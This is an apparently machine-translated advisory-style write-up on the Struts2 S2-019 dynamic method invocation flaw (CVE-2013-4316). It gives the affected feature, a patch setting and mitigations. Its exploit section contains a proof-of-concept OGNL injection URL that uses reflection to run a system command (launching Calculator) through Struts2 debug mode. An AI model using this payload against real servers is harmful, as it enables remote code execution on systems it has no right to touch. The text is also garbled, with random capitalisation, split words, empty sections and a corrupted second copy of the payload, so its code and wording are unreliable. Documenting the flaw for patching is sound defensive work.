Struts2 cve-2013-4316 s2-019 Dynamic method executions Vul

Catalog

1. Description
2. Effected Scope
3. Exploit Analysis
4. Principle of vulnerability
5. Patch Fix

1. Description

Dynamic method Invocation are a mechanism known to impose possible security vulnerabilities, but until now it is enabled B Y default with warning so users should switch it off if possible.

Relevant Link:

Http://struts.apache.org/docs/s2-019.html?spm=5176.775974950.2.8.iJuruO

2. Effected Scope
3. Exploit analysis

0x1:poc

Require target STRUTS2 application to open debug mode

http://localhost:8080/crazyit/register.action?debug=command&expression=%23f=%23_memberAccess.getClass%28% 29.getDeclaredField
%28%27allowstaticmethodaccess%27%29,%23f.setaccessible%28true%29,%23f.set%28%23_ Memberaccess,true%29,
@java. lang.runtime@getruntime%28%29.exec%28%27/applications/calculator.app/contents/ Macos/calculator%27%29/ 
*
http://localhost:8080/crazyit/register.action?debug=command&expression=# f= #_memberAccess. GetClass (). Getdeclaredfield (
' allowstaticmethodaccess '), #f. Setaccessible (True), #f. Set (#_ memberaccess,true),
@java. Lang.runtime@getruntime (). EXEC ('/applications/calculator.app/contents/macos/ Calculator ') 
* * *

Relevant Link:

http://qqhack8.blog.163.com/blog/static/114147985201463194423958/
http://qqhack8.blog.163.com/blog/static/ 114147985201402743220859

4. Principle of vulnerability
5. Patch Fix

0x1:upgrade struts2

In Struts 2.3.15.2 the "Dynamic method" invocation is to false by default. Another option is to set Struts.enable.DynamicMethodInvocation to False in Struts.xml

<constant name= "Struts.enable.DynamicMethodInvocation" value= "false"/>

0x2: Manual Repair method

1. Using filters to intercept related keywords, you need to modify Struts.xml and restart Struts2 application
2. Dynamically close the Struts2 property switch (Hotfix)
3. Use WAF to intercept at URL level

Relevant Link:

Http://www.fjssc.cn/html/research/notice/2014/0127/78.html